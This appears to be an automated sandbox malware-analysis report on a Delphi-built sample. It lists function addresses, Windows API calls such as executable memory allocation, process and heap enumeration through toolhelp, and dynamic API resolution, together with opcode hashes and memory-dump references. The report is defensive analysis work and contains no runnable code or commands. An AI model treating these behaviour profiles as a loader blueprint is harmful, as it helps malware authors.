                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CreateWindow
                                                                                                    • String ID:
                                                                                                    • API String ID: 716092398-0
                                                                                                    • Opcode ID: 251e92fc10e7af7397377603fe9152e2251dce8f56d160a47fc6d7711774cdb8
                                                                                                    • Instruction ID: 3c8f5c06fcfe07936af61cb21250ba916c6302b9643dfbfc1f8725505eaf2a4c
                                                                                                    • Opcode Fuzzy Hash: 251e92fc10e7af7397377603fe9152e2251dce8f56d160a47fc6d7711774cdb8
                                                                                                    • Instruction Fuzzy Hash: ACF09DB6600218BF8B80DE9DDC80EDB77ECEB8C2A4B054165FA0CD7200D670ED508BB4
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 032CEF38 Relevance: 1.5, APIs: 1, Instructions: 30COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • CLSIDFromProgID.OLE32(00000000,?,00000000,032CEF85,?,?,?,00000000), ref: 032CEF65
                                                                                                      • Part of subcall function 032B4F68: SysFreeString.OLEAUT32(0330C964), ref: 032B4F76
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FreeFromProgString
                                                                                                    • String ID:
                                                                                                    • API String ID: 4225568880-0
                                                                                                    • Opcode ID: a3310e8892e7b42386c3ae6f0fab848dffacee4ddbeac79324908176d918edb4
                                                                                                    • Instruction ID: 2de52f034a35863c78b5df1adfde5af906a9b08782a00ef2abaf94f11da891cb
                                                                                                    • Opcode Fuzzy Hash: a3310e8892e7b42386c3ae6f0fab848dffacee4ddbeac79324908176d918edb4
                                                                                                    • Instruction Fuzzy Hash: 7CE0E5346343487FD711EA61DC5199DB6ACDF8A780BB248B5E40097500DAB45E4080A0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 032B5B78 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetModuleFileNameA.KERNEL32(032B0000,?,00000105), ref: 032B5B96
                                                                                                      • Part of subcall function 032B5DDC: GetModuleFileNameA.KERNEL32(00000000,?,00000105,032B0000,0331A794), ref: 032B5DF8
                                                                                                      • Part of subcall function 032B5DDC: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,032B0000,0331A794), ref: 032B5E16
                                                                                                      • Part of subcall function 032B5DDC: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,032B0000,0331A794), ref: 032B5E34
                                                                                                      • Part of subcall function 032B5DDC: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 032B5E52
                                                                                                      • Part of subcall function 032B5DDC: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,032B5EE1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 032B5E9B
                                                                                                      • Part of subcall function 032B5DDC: RegQueryValueExA.ADVAPI32(?,032B6048,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,032B5EE1,?,80000001), ref: 032B5EB9
                                                                                                      • Part of subcall function 032B5DDC: RegCloseKey.ADVAPI32(?,032B5EE8,00000000,?,?,00000000,032B5EE1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 032B5EDB
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Open$FileModuleNameQueryValue$Close
                                                                                                    • String ID:
                                                                                                    • API String ID: 2796650324-0
                                                                                                    • Opcode ID: 3b17160cd34436c47c42d63791b6be8e89ec8c34d9187eb90482b984e983ccd8
                                                                                                    • Instruction ID: b09f5128d4a4cdde2732850970549b1630e423a2dd5c74fbda57a3ea02405bfb
                                                                                                    • Opcode Fuzzy Hash: 3b17160cd34436c47c42d63791b6be8e89ec8c34d9187eb90482b984e983ccd8
                                                                                                    • Instruction Fuzzy Hash: 54E06D72A113148FCF10DE58C9C0A8633E8AF09790F140691AC98CF34AD3B0DAA08BD0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 032B8D64 Relevance: 1.5, APIs: 1, Instructions: 23fileCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 032B8D78
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileWrite
                                                                                                    • String ID:
                                                                                                    • API String ID: 3934441357-0
                                                                                                    • Opcode ID: d4a83ef73bc856c33152c5a4506e379bca90fd87d8296263b7b9ff213f4cdc5f
                                                                                                    • Instruction ID: 259172643d9d6d67becfa50880ae2438c62c2bcf98518b09b30ef74c3864ae3a
                                                                                                    • Opcode Fuzzy Hash: d4a83ef73bc856c33152c5a4506e379bca90fd87d8296263b7b9ff213f4cdc5f
                                                                                                    • Instruction Fuzzy Hash: 64D05B763182517AD220E55A5C84EEB5BECCFC57B0F14063AB558C7181D6608C018371
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 03308AD4 Relevance: 1.5, APIs: 1, Instructions: 17COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 03308838: GetModuleHandleA.KERNEL32(kernel32.dll,00000002,03308ABF,?,?,03308B51,00000000,03308C2D), ref: 0330884C
                                                                                                      • Part of subcall function 03308838: GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 03308864
                                                                                                      • Part of subcall function 03308838: GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 03308876
                                                                                                      • Part of subcall function 03308838: GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 03308888
                                                                                                      • Part of subcall function 03308838: GetProcAddress.KERNEL32(00000000,Heap32First), ref: 0330889A
                                                                                                      • Part of subcall function 03308838: GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 033088AC
                                                                                                      • Part of subcall function 03308838: GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 033088BE
                                                                                                      • Part of subcall function 03308838: GetProcAddress.KERNEL32(00000000,Process32First), ref: 033088D0
                                                                                                      • Part of subcall function 03308838: GetProcAddress.KERNEL32(00000000,Process32Next), ref: 033088E2
                                                                                                      • Part of subcall function 03308838: GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 033088F4
                                                                                                      • Part of subcall function 03308838: GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 03308906
                                                                                                      • Part of subcall function 03308838: GetProcAddress.KERNEL32(00000000,Thread32First), ref: 03308918
                                                                                                      • Part of subcall function 03308838: GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 0330892A
                                                                                                      • Part of subcall function 03308838: GetProcAddress.KERNEL32(00000000,Module32First), ref: 0330893C
                                                                                                      • Part of subcall function 03308838: GetProcAddress.KERNEL32(00000000,Module32Next), ref: 0330894E
                                                                                                      • Part of subcall function 03308838: GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 03308960
                                                                                                      • Part of subcall function 03308838: GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 03308972
                                                                                                    • Process32First.KERNEL32(?,00000128), ref: 03308AE5
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$FirstHandleModuleProcess32
                                                                                                    • String ID:
                                                                                                    • API String ID: 2774106396-0
                                                                                                    • Opcode ID: a61ae50174cf867dbf7150e4ccfae690f933dd31855620bc3145320aefd9702a
                                                                                                    • Instruction ID: b5ebf6ee927052bb06ed9b3e0622050bf78dfa70f0cb8d1a9e6b92aa279565a4
                                                                                                    • Opcode Fuzzy Hash: a61ae50174cf867dbf7150e4ccfae690f933dd31855620bc3145320aefd9702a
                                                                                                    • Instruction Fuzzy Hash: C2C08CA2A02320178E10F6F82CD88C3878CCE491F370848B2B509EB142D2358C1092A0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 032B4F80 Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FreeString
                                                                                                    • String ID:
                                                                                                    • API String ID: 3341692771-0
                                                                                                    • Opcode ID: 4c26b98c80642be3bb457a0a6325ed943588a8704c231b59171f708dcadf21d2
                                                                                                    • Instruction ID: 86bcfd6edabc9705dfc9310cd310a6a9626536a5ae5762b02a2f888499de012d
                                                                                                    • Opcode Fuzzy Hash: 4c26b98c80642be3bb457a0a6325ed943588a8704c231b59171f708dcadf21d2
                                                                                                    • Instruction Fuzzy Hash: 8FC012B56712314BFF31E6999CC0BA563EC9B053D1F5800A1E504DB341E260E8504350
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 033180A8 Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • timeSetEvent.WINMM(00002710,00000000,0331809C,00000000,00000001), ref: 033180B8
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Eventtime
                                                                                                    • String ID:
                                                                                                    • API String ID: 2982266575-0
                                                                                                    • Opcode ID: 8fa96dadf32e4f756d12da986ffba8f10886f0d13de842ac16e7adfbe21a04f2
                                                                                                    • Instruction ID: 905394690ffd60708950b7d2e5836bbd45a33c80cf1d1a2eac6bcb610f83377a
                                                                                                    • Opcode Fuzzy Hash: 8fa96dadf32e4f756d12da986ffba8f10886f0d13de842ac16e7adfbe21a04f2
                                                                                                    • Instruction Fuzzy Hash: CEC09BF4B603047AF524F5B51CD1F6315ACD304741F5054117705FD2C1D2D65C504654
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 032B4F40 Relevance: 1.5, APIs: 1, Instructions: 10memoryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • SysAllocStringLen.OLEAUT32(00000000,?), ref: 032B4F47
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AllocString
                                                                                                    • String ID:
                                                                                                    • API String ID: 2525500382-0
                                                                                                    • Opcode ID: 61128e9512ae7fb8001b69d029d8ec20854896d5f37afe652109874d530df956
                                                                                                    • Instruction ID: 351ad1066289508ba29790c12cb04fc7d01388f3f5ec722bbb9deb4eb817dbb5
                                                                                                    • Opcode Fuzzy Hash: 61128e9512ae7fb8001b69d029d8ec20854896d5f37afe652109874d530df956
                                                                                                    • Instruction Fuzzy Hash: 40B0922823835350FA20F0A209417F241BC0B003C4F8800109D18C50C7D988C0A55035
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 032B4F58 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 032B4F5F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FreeString
                                                                                                    • String ID:
                                                                                                    • API String ID: 3341692771-0
                                                                                                    • Opcode ID: a73baa7010e2214fc82cb9e8665bcb2621c1da538b25aa4ddb9b3979219b4310
                                                                                                    • Instruction ID: f3e8f8ae27e0c39ba860e91227ec3e402efe1560e3a215c0f8acfbc3a978f957
                                                                                                    • Opcode Fuzzy Hash: a73baa7010e2214fc82cb9e8665bcb2621c1da538b25aa4ddb9b3979219b4310
                                                                                                    • Instruction Fuzzy Hash: 4CA022AC82033308CF0BFA2E00A0ABA22323FC0380BCCC0A800000F000CF3A80A0C020
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 032CE97C Relevance: 1.3, APIs: 1, Instructions: 52memoryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040), ref: 032CE99A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AllocVirtual
                                                                                                    • String ID:
                                                                                                    • API String ID: 4275171209-0
                                                                                                    • Opcode ID: 27a7f2f923741d910209d786271832bb55285ffad64e2d8768516367b8751d79
                                                                                                    • Instruction ID: 5184678eb29b9ae427e925f566fa48ce6c7f1c45dd39c9032d861a9b48700928
                                                                                                    • Opcode Fuzzy Hash: 27a7f2f923741d910209d786271832bb55285ffad64e2d8768516367b8751d79
                                                                                                    • Instruction Fuzzy Hash: AA1148782517468BC754DF18C8C0B82F7E5EF48391F10C62AE99A8F785D3B4E9448BA1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 032B1668 Relevance: 1.3, APIs: 1, Instructions: 38memoryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • VirtualAlloc.KERNEL32(00000000,00140000,00001000,00000004,?,032B1A9F,?,032B205D), ref: 032B167E
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AllocVirtual
                                                                                                    • String ID:
                                                                                                    • API String ID: 4275171209-0
                                                                                                    • Opcode ID: 150725a5a679f9a9fe0464c4080aeb867bcba5bf433aad586da81e7e35f815b3
                                                                                                    • Instruction ID: 989a19540834919433ddafcea10c09eb1e601893f8e5070e73e2e6f6d96fb889
                                                                                                    • Opcode Fuzzy Hash: 150725a5a679f9a9fe0464c4080aeb867bcba5bf433aad586da81e7e35f815b3
                                                                                                    • Instruction Fuzzy Hash: B0F049F07107004FDB15EF7EA994301BBE6E789385F24813DE609DB388E77994018B10
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 032B171E Relevance: 1.3, APIs: 1, Instructions: 36memoryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • VirtualAlloc.KERNEL32(00000000,?,00101000,00000004,?,?,?,?,032B205D), ref: 032B1740
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AllocVirtual
                                                                                                    • String ID:
                                                                                                    • API String ID: 4275171209-0
                                                                                                    • Opcode ID: 292d4e304001cc057f5ce5ba01cc78b57262ef6da8f78170d842727feb528d3d
                                                                                                    • Instruction ID: 7dbf4eda5ca9e1ed776beacf7431103ae99eacb2ad8ef40a78952859ff108d75
                                                                                                    • Opcode Fuzzy Hash: 292d4e304001cc057f5ce5ba01cc78b57262ef6da8f78170d842727feb528d3d
                                                                                                    • Instruction Fuzzy Hash: 8CF09AB6A00B556BD3209E5E9CC0B82BBA8FB117A0F050239FA089B344D7B1A8508BD4
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 032B1782 Relevance: 1.3, APIs: 1, Instructions: 25COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • VirtualFree.KERNEL32(?,00000000,00008000), ref: 032B17A0
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FreeVirtual
                                                                                                    • String ID:
                                                                                                    • API String ID: 1263568516-0
                                                                                                    • Opcode ID: bd1ec9eac06c9e1fe8901bf8c25d856a26f75ed5687c72466345e704ca103aed
                                                                                                    • Instruction ID: b3cb0cdd21b88d8d771555c78457779d2c25911899413bde46e520e0b63c1d21
                                                                                                    • Opcode Fuzzy Hash: bd1ec9eac06c9e1fe8901bf8c25d856a26f75ed5687c72466345e704ca103aed
                                                                                                    • Instruction Fuzzy Hash: C5E04F753203016FD7109A794C90B53AAE8EB457D1F284565F641DB241D7B0F85087A0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Non-executed Functions

                                                                                                    Function 03308838 Relevance: 59.6, APIs: 17, Strings: 17, Instructions: 99libraryloaderCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetModuleHandleA.KERNEL32(kernel32.dll,00000002,03308ABF,?,?,03308B51,00000000,03308C2D), ref: 0330884C
                                                                                                    • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 03308864
                                                                                                    • GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 03308876
                                                                                                    • GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 03308888
                                                                                                    • GetProcAddress.KERNEL32(00000000,Heap32First), ref: 0330889A
                                                                                                    • GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 033088AC
                                                                                                    • GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 033088BE
                                                                                                    • GetProcAddress.KERNEL32(00000000,Process32First), ref: 033088D0
                                                                                                    • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 033088E2
                                                                                                    • GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 033088F4
                                                                                                    • GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 03308906
                                                                                                    • GetProcAddress.KERNEL32(00000000,Thread32First), ref: 03308918
                                                                                                    • GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 0330892A
                                                                                                    • GetProcAddress.KERNEL32(00000000,Module32First), ref: 0330893C
                                                                                                    • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 0330894E
                                                                                                    • GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 03308960
                                                                                                    • GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 03308972
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$HandleModule
                                                                                                    • String ID: CreateToolhelp32Snapshot$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Module32First$Module32FirstW$Module32Next$Module32NextW$Process32First$Process32FirstW$Process32Next$Process32NextW$Thread32First$Thread32Next$Toolhelp32ReadProcessMemory$kernel32.dll
                                                                                                    • API String ID: 667068680-597814768
                                                                                                    • Opcode ID: 86b1fa445c1ce27fa6b0d7b6af330337ea9b5261cc8a48b08b9d58393abc083f
                                                                                                    • Instruction ID: a954cdf40d5ed1f20b6bafbbad1d9a0e2c411dc8025e1fab10f5c7eda0f090da
                                                                                                    • Opcode Fuzzy Hash: 86b1fa445c1ce27fa6b0d7b6af330337ea9b5261cc8a48b08b9d58393abc083f
                                                                                                    • Instruction Fuzzy Hash: 083107B5A11750AFDF48FBB4D8E6AA937B8EB09740F004561F065EF24AD2B48880CF16
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 032F7040 Relevance: 49.1, APIs: 15, Strings: 13, Instructions: 95libraryloaderCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • SetErrorMode.KERNEL32(00008000), ref: 032F7059
                                                                                                    • GetModuleHandleA.KERNEL32(USER32,00000000,032F71A6,?,00008000), ref: 032F707D
                                                                                                    • GetProcAddress.KERNEL32(00000000,WINNLSEnableIME), ref: 032F708A
                                                                                                    • LoadLibraryA.KERNEL32(imm32.dll,00000000,032F71A6,?,00008000), ref: 032F70A6
                                                                                                    • GetProcAddress.KERNEL32(00000000,ImmGetContext), ref: 032F70C8
                                                                                                    • GetProcAddress.KERNEL32(00000000,ImmReleaseContext), ref: 032F70DD
                                                                                                    • GetProcAddress.KERNEL32(00000000,ImmGetConversionStatus), ref: 032F70F2
                                                                                                    • GetProcAddress.KERNEL32(00000000,ImmSetConversionStatus), ref: 032F7107
                                                                                                    • GetProcAddress.KERNEL32(00000000,ImmSetOpenStatus), ref: 032F711C
                                                                                                    • GetProcAddress.KERNEL32(00000000,ImmSetCompositionWindow), ref: 032F7131
                                                                                                    • GetProcAddress.KERNEL32(00000000,ImmSetCompositionFontA), ref: 032F7146
                                                                                                    • GetProcAddress.KERNEL32(00000000,ImmGetCompositionStringA), ref: 032F715B
                                                                                                    • GetProcAddress.KERNEL32(00000000,ImmIsIME), ref: 032F7170
                                                                                                    • GetProcAddress.KERNEL32(00000000,ImmNotifyIME), ref: 032F7185
                                                                                                    • SetErrorMode.KERNEL32(?,032F71AD,00008000), ref: 032F71A0
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$ErrorMode$HandleLibraryLoadModule
